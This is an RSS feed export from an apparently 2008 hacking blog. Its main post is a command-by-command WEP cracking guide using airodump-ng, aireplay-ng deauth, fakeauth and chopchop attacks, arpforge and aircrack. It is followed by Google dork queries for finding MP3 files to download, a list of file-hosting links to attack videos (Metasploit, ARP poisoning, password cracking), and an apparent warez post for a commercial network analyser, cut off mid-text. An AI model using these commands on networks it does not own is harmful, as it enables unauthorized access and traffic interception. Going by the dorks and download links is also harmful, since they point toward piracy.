<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
	>

<channel>
	<title>My Dashboard &#187; Hack</title>
	<atom:link href="http://redglue.wordpress.com/category/hack/feed/" rel="self" type="application/rss+xml" />
	<link>http://redglue.wordpress.com</link>
	<description>Just another WordPress.com weblog</description>
	<lastBuildDate>Sat, 10 May 2008 00:05:48 +0000</lastBuildDate>
	<generator>http://wordpress.com/</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<cloud domain='redglue.wordpress.com' port='80' path='/?rsscloud=notify' registerProcedure='' protocol='http-post' />
<image>
		<url>http://www.gravatar.com/blavatar/81b8491fbcc96016995c6dc3dfbb22c1?s=96&#038;d=http://s.wordpress.com/i/buttonw-com.png</url>
		<title>My Dashboard &#187; Hack</title>
		<link>http://redglue.wordpress.com</link>
	</image>
	<atom:link rel="search" type="application/opensearchdescription+xml" href="http://redglue.wordpress.com/osd.xml" title="My Dashboard" />
		<item>
		<title>Cracking WEP: The ultimate guide</title>
		<link>http://redglue.wordpress.com/2008/05/10/cracking-wep-the-ultimate-guide/</link>
		<comments>http://redglue.wordpress.com/2008/05/10/cracking-wep-the-ultimate-guide/#comments</comments>
		<pubDate>Sat, 10 May 2008 00:05:48 +0000</pubDate>
		<dc:creator>redwaters</dc:creator>
				<category><![CDATA[Hack]]></category>

		<guid isPermaLink="false">http://redglue.wordpress.com/?p=16</guid>
		<description><![CDATA[1. Download BackTrack (http://www.remote-exploit.org/index.php/BackTrack_Downloads)
2. Install BackTrack to your hd or just boot the live cd (username: root, password: toor; Don’t froget to start the gui: type in startx on the command lien after logging in).
3. Start up a terminal and set your wireless interface in monitor mode.
iwconfig [wireless interface] mode monitor
* to find out what [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=16&subd=redglue&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>1. Download BackTrack (http://www.remote-exploit.org/index.php/BackTrack_Downloads)</p>
<p>2. Install BackTrack to your hd or just boot the live cd (username: root, password: toor; Don’t froget to start the gui: type in startx on the command lien after logging in).</p>
<p>3. Start up a terminal and set your wireless interface in monitor mode.</p>
<blockquote><p>iwconfig [wireless interface] mode monitor</p></blockquote>
<blockquote><p>* to find out what your wireless interface is, type iwconfig and press enter. All interfaces will show up (mine is ath0).</p>
<p>4. Start airodump by typing in the terminal (press enter after typing it in)</p></blockquote>
<blockquote><p>airodump-ng –ivs -w capture [wireless interface]</p></blockquote>
<blockquote><p>5. When airodump found the network you want to hack it’ll show up. Note the BSSID (acces point’s mac address) and the SSID (the access point’s name). Don’t close this terminal window or stop airodump from running before you have the wep key!</p></blockquote>
<blockquote><p>##### Generating data, method one: There are clients visible in airodump associated to the network #####</p></blockquote>
<blockquote><p>1. Open a new terminal window and type in (press enter after typing in):</p></blockquote>
<blockquote><p>aireplay-ng [wireless interface] –arpreplay -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06</p></blockquote>
<blockquote><p>2. Open another new terminal window and type in (press enter after typing in):</p></blockquote>
<blockquote><p>aireplay-ng [wireless interface] –deauth 10 -a [the client’s MAC adress]</p></blockquote>
<blockquote><p>3. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.</p></blockquote>
<blockquote><p>##### Generating data, method two: There are NO clients visible in airodump associated to the network #####</p></blockquote>
<blockquote><p>1. Open a new terminal window and type in (do NOT press the enter button!)</p></blockquote>
<blockquote><p>aireplay-ng [wireless interface] –arpreplay -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06</p></blockquote>
<blockquote><p>2. Open another new terminal window and type in (do NOT press the enter button!):</p></blockquote>
<blockquote><p>aireplay-ng [wireless interface] –fakeauth -e [the SSID which you found with airodump] -a [the BSSID you found wth airodump] -h 01:02:03:04:05:06</p></blockquote>
<blockquote><p>3. Press enter in the fakeauth terminal and after it started to fakeauth, press enter as quickly as possible in the arpreplay window.</p></blockquote>
<blockquote><p>3. Open another new terminal window and type in (press enter after typing in):</p></blockquote>
<blockquote><p>aireplay-ng [wireless interface] –deauth 10 -a 01:02:03:04:05:06</p></blockquote>
<blockquote><p>4. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.</p>
<p>##### If the above two methods aren’t working, try this #####</p>
<p>1. Open a new terminal window and type in (press the enter button after typing it in):</p></blockquote>
<blockquote><p>aireplay-ng [wireless interface] –fakeauth -e [the SSID which you found with airodump] -a [the BSSID you found wth airodump] -h 01:02:03:04:05:06</p></blockquote>
<blockquote><p>2. Open another new terminal window and type in (press the enter button after typing it in):</p></blockquote>
<blockquote><p>aireplay-ng [wireless interface] –chopchop -e [the SSID which you found with airodump] -b [the BSSID you found wth airodump] -h 01:02:03:04:05:06</p></blockquote>
<blockquote><p>3. The chopchop starts reading packages. When it finds one, it’ll ask you to use it. Choose yes. Wait a few seconds/minutes and remember the filename that is given to you at the end.</p>
<p>4. Open Ethereal (click the icon in the bottom left corner &gt; Backtrack &gt; Sniffers &gt; Ethereal) and open the xor file made with the chopchop attack in Ethereal (it’s located in the home folder)</p>
<p>5. Look with Ethereal in the captured file. Try to find the source ip and the destination ip: write those addresses down somewhere.</p>
<p>6. open a terminal and type in (press enter after typing in):</p></blockquote>
<blockquote><p>arpforge-ng [the name of the xor file from the chopchop attack] 1 [the BSSID you found wth airodump] 01:02:03:04:05:06 [the source ip] [the destination ip] arp.cap</p></blockquote>
<blockquote><p>7. In a new or in the same terinal window, type in (and press enter):</p></blockquote>
<blockquote><p>aireplay-ng -2 ath0 -r arp.cap</p></blockquote>
<blockquote><p>5. Wait a long time, aproximatly 10 minutes. You should see the data field in airodump raising. If you have around 500k of data, go to the cracking step of this tutorial.</p>
<p>##### The actual cracking of the WEP key #####</p>
<p>1. Open a new terminal window and type in</p></blockquote>
<blockquote><p>airecrack-ng -n 64 capture-01.ivs (for a 64 bits encryption, enter after typing)</p></blockquote>
<blockquote><p>or</p></blockquote>
<blockquote><p>airecrack-ng -n 128 capture-01.ivs (for a 128 bits encryption, enter after typing)</p></blockquote>
<blockquote><p>If you don’t know how strong the encryption is, type in both in different terminals and start a third terminal. Type in this code:</p></blockquote>
<blockquote><p>airecrack-ng capture-01.ivs</p></blockquote>
<blockquote><p>2. Wait a few minutes. Check the terminal(s). The code will automaticly show up if found. Keep airodump running!<br />
DISLAIMER:I don’t think I have to mention that you need written permission from the owner of the network before you are allowed to start cracking his wep or even before you are allowed to capture packages. Just try it with your own network. You’ll learn a lot about it. But never ever try it with another network than your own.</p></blockquote>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/redglue.wordpress.com/16/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/redglue.wordpress.com/16/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/redglue.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/redglue.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/redglue.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/redglue.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/redglue.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/redglue.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/redglue.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/redglue.wordpress.com/16/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/redglue.wordpress.com/16/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/redglue.wordpress.com/16/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=16&subd=redglue&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://redglue.wordpress.com/2008/05/10/cracking-wep-the-ultimate-guide/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/ee40b8a71c87b6e95a5b1b4f8016de2a?s=96&#38;d=identicon" medium="image">
			<media:title type="html">redwaters</media:title>
		</media:content>
	</item>
		<item>
		<title>Google Hack to Search MP3</title>
		<link>http://redglue.wordpress.com/2008/05/09/google-hack-to-search-mp3/</link>
		<comments>http://redglue.wordpress.com/2008/05/09/google-hack-to-search-mp3/#comments</comments>
		<pubDate>Fri, 09 May 2008 23:23:17 +0000</pubDate>
		<dc:creator>redwaters</dc:creator>
				<category><![CDATA[Hack]]></category>

		<guid isPermaLink="false">http://redglue.wordpress.com/?p=14</guid>
		<description><![CDATA[Note :
[Directory String]
- “index of”
- “last modified”
- “parent of”
[File Type]
- “mo3″
- “wma”
- “shn”
[MP3 Name]
- Nama Album
- Nama Artis
- Judul Lagu
- Creativitas User 
[Limitors]
-html -htm -php -asp -txt -pls
Format Stringnya :
1.   [Directory String] + (inurl:)[file type] + [mp3 name]
2.   [Directory String] + (intitle:)[file type] + [mp3 name]
3.   [Directory String] + [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=14&subd=redglue&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Note :<br />
[Directory String]<br />
- “index of”<br />
- “last modified”<br />
- “parent of”</p>
<p>[File Type]<br />
- “mo3″<br />
- “wma”<br />
- “shn”</p>
<p>[MP3 Name]<br />
- Nama Album<br />
- Nama Artis<br />
- Judul Lagu<br />
- Creativitas User <img class="wp-smiley" src="http://s.wordpress.com/wp-includes/images/smilies/icon_smile.gif" alt=")" /></p>
<p>[Limitors]<br />
-html -htm -php -asp -txt -pls</p>
<p>Format Stringnya :<br />
1.   [Directory String] + (inurl:)[file type] + [mp3 name]<br />
2.   [Directory String] + (intitle:)[file type] + [mp3 name]<br />
3.   [Directory String] + [file type] + [mp3 name] + [limitors]<br />
4.   intitle:index.of + mp3 + “grandaddy” -html -htm -php -asp apache feb-2005<br />
5.   intitle:index.of + mp3 + “grandaddy” -html -htm -php -asp apache 2005<br />
6.   intitle:index.of + mp3 + -html -htm -php -asp apache mar<br />
7.   “xitami web server” + (inurl:)[file type] + [mp3 name]<br />
8.   “xitami web server” + (intitle:)[file type] + [mp3 name]<br />
9.   “directory listings” + (inurl:)[file type] + [mp3 name]<br />
10. “directory listings of” + (inurl:)[file type] + [mp3 name]<br />
11. “directory listings of” + (intitle:)[file type] + [mp3 name]<br />
12. [mp3 name].mp3 -playlist -filetype:txt</p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/redglue.wordpress.com/14/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/redglue.wordpress.com/14/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/redglue.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/redglue.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/redglue.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/redglue.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/redglue.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/redglue.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/redglue.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/redglue.wordpress.com/14/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/redglue.wordpress.com/14/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/redglue.wordpress.com/14/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=14&subd=redglue&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://redglue.wordpress.com/2008/05/09/google-hack-to-search-mp3/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/ee40b8a71c87b6e95a5b1b4f8016de2a?s=96&#38;d=identicon" medium="image">
			<media:title type="html">redwaters</media:title>
		</media:content>

		<media:content url="http://s.wordpress.com/wp-includes/images/smilies/icon_smile.gif" medium="image">
			<media:title type="html">)</media:title>
		</media:content>
	</item>
		<item>
		<title>Hacking WEP Wireless</title>
		<link>http://redglue.wordpress.com/2008/05/09/hacking-wep-wireless/</link>
		<comments>http://redglue.wordpress.com/2008/05/09/hacking-wep-wireless/#comments</comments>
		<pubDate>Fri, 09 May 2008 23:19:15 +0000</pubDate>
		<dc:creator>redwaters</dc:creator>
				<category><![CDATA[Hack]]></category>

		<guid isPermaLink="false">http://redglue.wordpress.com/?p=13</guid>
		<description><![CDATA[Download video tutorial hacking WEP wireless
128 Bit Wep Cracking With Injection!.swf
http://rapidshare.com/files/31477043/hv1.rar
A Penetration Attack Reconstructed.avi
http://rapidshare.com/files/31480758/hv2.rar
A Quick and Dirty Intro to Nessus using the Auditor Boot CD!.swf
http://rapidshare.com/files/31481861/hv3.rar
Adding Modules to a Slax or Backtrack Live CD from Windows.swf
http://rapidshare.com/files/31482388/hv4.rar
Airplay replay attack &#8211; no wireless client required.swf
http://rapidshare.com/files/31482894/hv5.rar
Anonym.OS LiveCD with build in Tor Onion routing and Privoxy.swf
http://rapidshare.com/files/31483265/hv6.rar
BackTrack LiveCD to HD Installation [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=13&subd=redglue&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>Download video tutorial hacking WEP wireless</p>
<p>128 Bit Wep Cracking With Injection!.swf<br />
<a href="http://rapidshare.com/files/31477043/hv1.rar" target="_blank">http://rapidshare.com/files/31477043/hv1.rar</a></p>
<p>A Penetration Attack Reconstructed.avi<br />
<a href="http://rapidshare.com/files/31480758/hv2.rar">http://rapidshare.com/files/31480758/hv2.rar</a></p>
<p>A Quick and Dirty Intro to Nessus using the Auditor Boot CD!.swf<br />
<a href="http://rapidshare.com/files/31481861/hv3.rar" target="_blank">http://rapidshare.com/files/31481861/hv3.rar</a></p>
<p>Adding Modules to a Slax or Backtrack Live CD from Windows.swf<br />
<a href="http://rapidshare.com/files/31482388/hv4.rar" target="_blank">http://rapidshare.com/files/31482388/hv4.rar</a></p>
<p>Airplay replay attack &#8211; no wireless client required.swf<br />
<a href="http://rapidshare.com/files/31482894/hv5.rar">http://rapidshare.com/files/31482894/hv5.rar</a></p>
<p>Anonym.OS LiveCD with build in Tor Onion routing and Privoxy.swf<br />
<a href="http://rapidshare.com/files/31483265/hv6.rar" target="_blank">http://rapidshare.com/files/31483265/hv6.rar</a></p>
<p>BackTrack LiveCD to HD Installation Instruction Video.swf<br />
<a href="http://rapidshare.com/files/31483709/hv7.rar" target="_blank">http://rapidshare.com/files/31483709/hv7.rar</a></p>
<p>Basic Nmap Usage!.swf<br />
<a href="http://rapidshare.com/files/31484459/hv8.rar" target="_blank">http://rapidshare.com/files/31484459/hv8.rar</a></p>
<p>Basic Tools for Wardriving!.swf<br />
<a href="http://rapidshare.com/files/31485447/hv9.rar" target="_blank">http://rapidshare.com/files/31485447/hv9.rar</a></p>
<p>Bluesnarfer attack tool demonstration.swf<br />
<a href="http://rapidshare.com/files/31486249/hv10.rar" target="_blank">http://rapidshare.com/files/31486249/hv10.rar</a></p>
<p>Bluesnarfing a Nokia 6310i hand set.avi<br />
<a href="http://rapidshare.com/files/31486983/hv11.rar" target="_blank">http://rapidshare.com/files/31486983/hv11.rar</a></p>
<p>Breaking WEP in 10 minutes.avi<br />
<a href="http://rapidshare.com/files/31489615/hv12.rar" target="_blank">http://rapidshare.com/files/31489615/hv12.rar</a></p>
<p>Cain to ARP poison and sniff passwords!.avi<br />
<a href="http://rapidshare.com/files/31489735/hv13.rar" target="_blank">http://rapidshare.com/files/31489735/hv13.rar</a></p>
<p>Complete Hacking Video using Metasploit &#8211; Meterpreter.swf<br />
<a href="http://rapidshare.com/files/31490690/hv14.rar" target="_blank">http://rapidshare.com/files/31490690/hv14.rar</a></p>
<p>Cracking a 128 bit WEP key (Auditor).swf<br />
<a href="http://rapidshare.com/files/31496176/hv15.rar" target="_blank">http://rapidshare.com/files/31496176/hv15.rar</a></p>
<p>Cracking a 128 Bit Wep key + entering the cridentials.swf<br />
<a href="http://rapidshare.com/files/31498043/hv16.rar" target="_blank">http://rapidshare.com/files/31498043/hv16.rar</a></p>
<p>Cracking Syskey and the SAM on Windows Using Samdump2 and John!.swf<br />
<a href="http://rapidshare.com/files/31498481/hv17.rar" target="_blank">http://rapidshare.com/files/31498481/hv17.rar</a></p>
<p>Cracking Windows Passwords with BackTrack and the Online Rainbow Tables at Plain-Text!.swf<br />
<a href="http://rapidshare.com/files/31499002/hv18.rar" target="_blank">http://rapidshare.com/files/31499002/hv18.rar</a></p>
<p>Cracking WPA Networks (Auditor).swf<br />
<a href="http://rapidshare.com/files/31500300/hv19.rar" target="_blank">http://rapidshare.com/files/31500300/hv19.rar</a></p>
<p>DoS attack against Windows FTP Server &#8211; DoS.avi<br />
<a href="http://rapidshare.com/files/31501194/hv20.rar" target="_blank">http://rapidshare.com/files/31501194/hv20.rar</a></p>
<p>Droop s Box Simple Pen-test Using Nmap, Nikto, Bugtraq, Nslookup and Other Tools!.swf<br />
<a href="http://rapidshare.com/files/31501876/hv21.rar" target="_blank">http://rapidshare.com/files/31501876/hv21.rar</a></p>
<p>Exploiting some bugs of tools used in Windows.swf<br />
<a href="http://rapidshare.com/files/31504093/hv22.rar" target="_blank">http://rapidshare.com/files/31504093/hv22.rar</a></p>
<p>Exploiting weaknesses of PPTP VPN (Auditor).swf<br />
<a href="http://rapidshare.com/files/31505446/hv23.rar" target="_blank">http://rapidshare.com/files/31505446/hv23.rar</a></p>
<p>Finding Rogue SMB File Shares On Your Network!.swf<br />
<a href="http://rapidshare.com/files/31505931/hv24.rar" target="_blank">http://rapidshare.com/files/31505931/hv24.rar</a></p>
<p>Fun with Ettercap Filters!.swf<br />
<a href="http://rapidshare.com/files/31506167/hv25.rar" target="_blank">http://rapidshare.com/files/31506167/hv25.rar</a></p>
<p>How to crack the local windows passwords in the SAM database.swf<br />
<a href="http://rapidshare.com/files/31506295/hv26.rar" target="_blank">http://rapidshare.com/files/31506295/hv26.rar</a></p>
<p>How to decrypt SSL encrypted traffic using a man in the middle attack (Auditor).swf<br />
<a href="http://rapidshare.com/files/31509029/hv27.rar" target="_blank">http://rapidshare.com/files/31509029/hv27.rar</a></p>
<p>How to sniff around switches using Arpspoof and Ngrep!.avi<br />
<a href="http://rapidshare.com/files/31512416/hv28.rar" target="_blank">http://rapidshare.com/files/31512416/hv28.rar</a></p>
<p>Install VNC Remotely!.avi<br />
<a href="http://rapidshare.com/files/31512417/hv29.rar" target="_blank">http://rapidshare.com/files/31512417/hv29.rar</a></p>
<p>Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Hi-Res).avi<br />
<a href="http://rapidshare.com/files/31512418/hv30.rar" target="_blank">http://rapidshare.com/files/31512418/hv30.rar</a></p>
<p>Internet Explorer Remote Command Execution Exploit (CMDExe) Client Side Attack (Lo-Res).avi<br />
<a href="http://rapidshare.com/files/31514267/hv31.rar" target="_blank">http://rapidshare.com/files/31514267/hv31.rar</a></p>
<p>John The Ripper 1.7 password cracker Installation Instruction Video.swf<br />
<a href="http://rapidshare.com/files/31514447/hv32.rar" target="_blank">http://rapidshare.com/files/31514447/hv32.rar</a></p>
<p>Local Password Cracking Presentation for the Indiana Higher Education Cybersecurity Summit 2005!.swf<br />
<a href="http://rapidshare.com/files/31514918/hv33.rar" target="_blank">http://rapidshare.com/files/31514918/hv33.rar</a></p>
<p>MAC Bridging with Windows XP and Sniffing!.swf<br />
<a href="http://rapidshare.com/files/31515325/hv34.rar" target="_blank">http://rapidshare.com/files/31515325/hv34.rar</a></p>
<p>Mass De-Authentication using void11 (Auditor).swf<br />
<a href="http://rapidshare.com/files/31516717/hv35.rar" target="_blank">http://rapidshare.com/files/31516717/hv35.rar</a></p>
<p>Metasploit Flash Tutorial!.swf<br />
<a href="http://rapidshare.com/files/31516967/hv36.rar" target="_blank">http://rapidshare.com/files/31516967/hv36.rar</a></p>
<p>MITM Hijacking.wmv<br />
<a href="http://rapidshare.com/files/31519959/hv37.rar" target="_blank">http://rapidshare.com/files/31519959/hv37.rar</a></p>
<p>Nmap Video Tutorial 2 Port Scan Boogaloo!.swf<br />
<a href="http://rapidshare.com/files/31522321/hv38.rar" target="_blank">http://rapidshare.com/files/31522321/hv38.rar</a></p>
<p>Sniffing logins and passwords.avi<br />
<a href="http://rapidshare.com/files/31522322/hv39.rar" target="_blank">http://rapidshare.com/files/31522322/hv39.rar</a></p>
<p>Sniffing Remote Router Traffic via GRE Tunnels (Lo-Res).avi<br />
<a href="http://rapidshare.com/files/31526967/hv41.rar" target="_blank">http://rapidshare.com/files/31526967/hv41.rar</a></p>
<p>Sniffing VoIP Using Cain!.swf<br />
<a href="http://rapidshare.com/files/31529820/hv42.rar" target="_blank">http://rapidshare.com/files/31529820/hv42.rar</a></p>
<p>Snort Instruction video &#8211; howto install into backtrack.swf<br />
<a href="http://rapidshare.com/files/31529822/hv43.rar" target="_blank">http://rapidshare.com/files/31529822/hv43.rar</a></p>
<p>SSH Dynamic Port Forwarding!.swf<br />
<a href="http://rapidshare.com/files/31529823/hv44.rar" target="_blank">http://rapidshare.com/files/31529823/hv44.rar</a></p>
<p>Start a session and get interactive commandline access to a remote Windows box!.avi<br />
<a href="http://rapidshare.com/files/31529824/hv45.rar" target="_blank">http://rapidshare.com/files/31529824/hv45.rar</a></p>
<p>Telnet Bruteforce.avi<br />
<a href="http://rapidshare.com/files/31529825/hv46.rar" target="_blank">http://rapidshare.com/files/31529825/hv46.rar</a></p>
<p>Tunneling Exploits through SSH.avi<br />
<a href="http://rapidshare.com/files/31529826/hv47.rar" target="_blank">http://rapidshare.com/files/31529826/hv47.rar</a></p>
<p>Use Brutus to crack a box running telnet!.avi<br />
<a href="http://rapidshare.com/files/31530857/hv48.rar" target="_blank">http://rapidshare.com/files/31530857/hv48.rar</a></p>
<p>Using NetworkActiv to sniff webpages on a Wi-Fi network!.swf<br />
<a href="http://rapidshare.com/files/31530858/hv49.rar" target="_blank">http://rapidshare.com/files/31530858/hv49.rar</a></p>
<p>WEP Cracking using Aireplay v2.2 Beta 7 (Whax 3.0).swf<br />
<a href="http://rapidshare.com/files/31530859/hv50.rar" target="_blank">http://rapidshare.com/files/31530859/hv50.rar</a></p>
<p>WMF File Code Execution Vulnerability With Metasploit!.swf<br />
<a href="http://rapidshare.com/files/31530860/hv51.rar" target="_blank">http://rapidshare.com/files/31530860/hv51.rar</a></p>
<p>WPA Cracking using Aireplay v2.2 Beta 7 (Whax 3.0).swf<br />
<a href="http://rapidshare.com/files/31530861/hv52.rar" target="_blank">http://rapidshare.com/files/31530861/hv52.rar</a></p>
<img alt="" border="0" src="http://feeds.wordpress.com/1.0/categories/redglue.wordpress.com/13/" /> <img alt="" border="0" src="http://feeds.wordpress.com/1.0/tags/redglue.wordpress.com/13/" /> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gocomments/redglue.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/comments/redglue.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godelicious/redglue.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/delicious/redglue.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/gostumble/redglue.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/stumble/redglue.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/godigg/redglue.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/digg/redglue.wordpress.com/13/" /></a> <a rel="nofollow" href="http://feeds.wordpress.com/1.0/goreddit/redglue.wordpress.com/13/"><img alt="" border="0" src="http://feeds.wordpress.com/1.0/reddit/redglue.wordpress.com/13/" /></a> <img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=13&subd=redglue&ref=&feed=1" /></div>]]></content:encoded>
			<wfw:commentRss>http://redglue.wordpress.com/2008/05/09/hacking-wep-wireless/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
	
		<media:content url="http://0.gravatar.com/avatar/ee40b8a71c87b6e95a5b1b4f8016de2a?s=96&#38;d=identicon" medium="image">
			<media:title type="html">redwaters</media:title>
		</media:content>
	</item>
		<item>
		<title>WildPackets OmniPeek Enterprise with Enhanced Voice Option v5.0 Retail</title>
		<link>http://redglue.wordpress.com/2008/05/08/wildpackets-omnipeek-enterprise-with-enhanced-voice-option-v50-retail/</link>
		<comments>http://redglue.wordpress.com/2008/05/08/wildpackets-omnipeek-enterprise-with-enhanced-voice-option-v50-retail/#comments</comments>
		<pubDate>Thu, 08 May 2008 22:23:29 +0000</pubDate>
		<dc:creator>redwaters</dc:creator>
				<category><![CDATA[Hack]]></category>

		<guid isPermaLink="false">http://redglue.wordpress.com/?p=6</guid>
		<description><![CDATA[WildPackets OmniPeek Enterprise with Enhanced Voice Option combines all of the features of the OmniPeek product line in one product, including support for local captures from multiple interfaces and connections to an unlimited number of OmniEngines. It also supports data collection from any network topology, including Gigabit networks, WAN links and local matrix switches.
OmniPeek Enterprise [...]<img alt="" border="0" src="http://stats.wordpress.com/b.gif?host=redglue.wordpress.com&blog=3636276&post=6&subd=redglue&ref=&feed=1" />]]></description>
			<content:encoded><![CDATA[<div class='snap_preview'><br /><p>WildPackets OmniPeek Enterprise with Enhanced Voice Option combines all of the features of the OmniPeek product line in one product, including support for local captures from multiple interfaces and connections to an unlimited number of OmniEngines. It also supports data collection from any network topology, including Gigabit networks, WAN links and local matrix switches.</p>
<p>OmniPeek Enterprise is ideal for IT organizations responsible for network analysis and network services SLAs for the entire organization. A license of OmniPeek Enterprise should be considered for each location that will be supported by a network engineering professional. OmniPeek Enterprise also supports the Enhanced Voice Option.</p>
<p>New Things in Omni v5:</p>
<p>1. Support for 802.11n<br />
OmniPeek with 802.11n enhancements is capable of capturing, decoding, analyzing and displaying all 802.11n traffic. It works with many commercially available 802.11n wireless adapters to capture traffic, including management and data frames. It decodes all 11n-specific informa-tion, whether that information is in SISO beacons (beacons that any 802.11 AP or client can receive) or 11n-specific packets. OmniPeek detects and reports the presence of 802.11n APs and their capabilities, and compiles the results from all captured and decoded packets into detailed statistics and expert analyses. Displayed data follows the user-friendly and award-winning WildPackets UI elements, significantly reducing the learning curve of analyzing 802.11n traffic.</p>
<p>2. Omni Virtual Network Service<br />
A new addition to the OmniAnalysis Platform, the Omni Virtual Network Service is a lightweight traffic-capture service that enables IT engineers to capture and analyze the ‘invisible traffic’ on virtual servers. ‘Invisible traffic’ is traffic on virtual servers which never crosses a physical network segment where it can be captured. Omni Virtual Network Service helps organizations troubleshoot and optimize the network environment on these servers to ensure the proper functionality in data centers and server farms.</p>
<p>3. Next-Generation Network Forensics<br />
OmniAnalysis 5 also includes WildPackets next-generation network forensics capabilities for capturing and analyzing historical network traffic. WildPackets network forensics solutions, typically featuring an Omni pliance network recorder, can be used for performing retrospective analysis on network traffic for network trouble-shooting, application performance benchmarking, security attack analysis, HR and policy compliance investigations, and transaction analysis.<br />
The value of WildPackets’ network forensics capabilities is in its ability to capture, search and gather the actual traffic for analysis using the same environment as real time troubleshooting. OmniAnalysis 5 adds the ability to replay applications including web pages, email traffic, IM, and VoIP call playback so investigators can see what users are doing. New memory management and UI enhancements make data queries even faster, more efficient, and more precise.</p>
<p>4. Instant Visibility<br />
In an effort to further expose network conditions with enhanced visibility, WildPackets introduces a number of new displays within OmniAnalysis 5 &#8211; the new OmniPeek Dashboard and new wireless and Apdex displays.</p>
<p>5. Improved Media Support<br />
To deploy and maintain a successful Voice over IP (VoIP) implementation, you need to be able to analyze and troubleshoot voice traffic and the network the voice traffic is running on. You need to be able to understand how other applications are affecting voice traffic &#8211; and vice versa.<br />
In OmniAnalysis 5, the Enhanced Media Option now has its media analysis fully integrated with the expert network heuristics which allows for the support of simultaneous media analysis and network infrastructure analysis. The Enhanced Media Option allows for the detailed analysis of both the signaling (call set-up) and the payload (the actual voice or video) as well as the ability for VoIP call playback.</p>
<p>6. 10GbE<br />
With OmniAnalysis 5, WildPackets also introduces new 10 Gigabit hardware. Leveraging this specialized hardware, engineers can effectively use OmniAnalysis to capture and analyze traffic from 10 Gigabit segments.</p>
<p>* Real-time VoIP Media Analysis:<br />
The VoIP Media view provides unique real-time VoIP troubleshooting and call drill-down capabilities, such as extensive select-related and parameter filtering capabilities that lead to faster problem identification and resolution. It offers complete, real-time VoIP Media analytics to verify call quality using R-Factor and MOS Score measurements.</p>
